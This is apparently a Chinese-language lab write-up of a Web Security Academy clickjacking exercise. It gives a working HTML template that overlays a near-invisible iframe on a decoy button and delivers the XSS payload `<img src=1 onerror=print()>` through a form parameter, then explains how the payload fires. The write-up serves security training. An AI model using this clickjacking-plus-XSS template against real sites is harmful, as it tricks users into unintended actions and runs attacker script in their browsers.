# Clickjacking Lab4 這題目標是讓受害者在不知情的情況下: - 以惡意參數發送回饋表單 - 點擊「Submit feedback」按鈕 - 成功觸發 DOM XSS 中的 print() 函數(模擬攻擊觸發) 一樣先進入網站。   只要寫一個假的按鈕後,上面再疊一個透明的惡意按鈕,這樣使用者只會看到下層的按鈕,但觸發的效果是上層惡意按鈕的行為。 ```html= <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.00000000000000001; z-index: 2; } div { position:absolute; top:620px; left:80px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a41008b04b4170980ad032500af00b9.web-security-academy.net/feedbackk?name=<img src=1 onerror=print()>&email=hacker@attacker-website.com&subject=test&message=test#feedbackResult"></iframe> ``` `<img src=1 onerror=print()>`: 這是 XSS 攻擊中常見的「圖片錯誤觸發事件」,print() 是故意放進去當測試函數(如果是瀏覽器可以執行 alert() 會更明顯),這時候瀏覽器會載入圖片,由於 src=1 是不存在的資源,所以會錯誤,然後觸發。 目的是在測這個網站是否會把 name 這個參數直接插進 HTML(未轉義),造成 XSS。 ### 簡單來說 XSS 就像你在表單寫下「我叫 <炸彈>」,結果網站沒看清楚就當真放進網頁,炸了自己一臉。💥  ---
×
Sign in
Email
Password
Forgot password
or
By clicking below, you agree to our
terms of service
.
Sign in via Facebook
Sign in via Twitter
Sign in via GitHub
Sign in via Dropbox
Sign in with Wallet
Wallet (
)
Connect another wallet
New to HackMD?
Sign up